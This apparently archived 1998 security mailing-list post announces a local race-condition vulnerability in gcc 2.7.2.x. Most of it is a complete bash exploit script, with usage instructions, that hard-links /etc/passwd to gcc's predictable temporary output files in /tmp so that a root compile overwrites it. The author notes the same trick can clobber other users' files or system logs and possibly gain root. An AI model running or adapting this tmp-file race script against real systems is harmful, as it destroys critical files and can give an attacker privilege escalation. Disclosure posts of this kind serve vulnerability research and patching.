Try this. Launch it as a unprivledged user in background (screen?), then, as a root, try to compile any file or project using gcc (eg. typical daemon, service, client), and watch out your /etc/passwd (or any other vital file, eg. /dev/kmem, /dev/hda). Attached exploit is an improved version of that one I previously posted onto BUGTRAQ (yesterday). It's also possible to overwrite other user's files (if only he/she uses gcc occassionally), system logs etc. Vunerable platforms: any running gcc 2.7.2.x Compromise: overwriting files, maybe root; exploitable locally. -- cut here -- #!/bin/bash # [ http://www.rootshell.com ] 1/16/98 # Simple GCC exploit (tested under 2.7.2.3.f.1) # - by Michal Zalewski (lcamtuf@staszic.waw.pl) # --------------------------------------------- # Usage: "screen ./gcc_ln" then Ctrl+A,D # --------------------------------------------- # Ugh, blah... Should be written in C for # better performance, but I have no time :) VICTIM=/etc/passwd if [ ! -f $VICTIM ]; then echo "I can't see my victim ($VICTIM)..." exit 0 fi ORIG=`ls -l $VICTIM|awk '{print \$5}'` echo "GCC exploit launched against $VICTIM ($ORIG bytes)." renice +20 $PPID >&/dev/null cd /tmp while [ 1 ]; do V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."` if [ ! "$V" = "" ]; then ln $VICTIM ${V}.s &>/dev/null ln $VICTIM ${V}1.o &>/dev/null NOWY=`ls -l $VICTIM|awk '{print \$5}'` if [ "$ORIG" = "$NOWY" ]; then echo -n "." rm -f ${V}.s ${V}1.o &>/dev/null else echo "Voila. I'm so smart." rm -f ${V}.s ${V}1.o &>/dev/null exit 0 fi fi done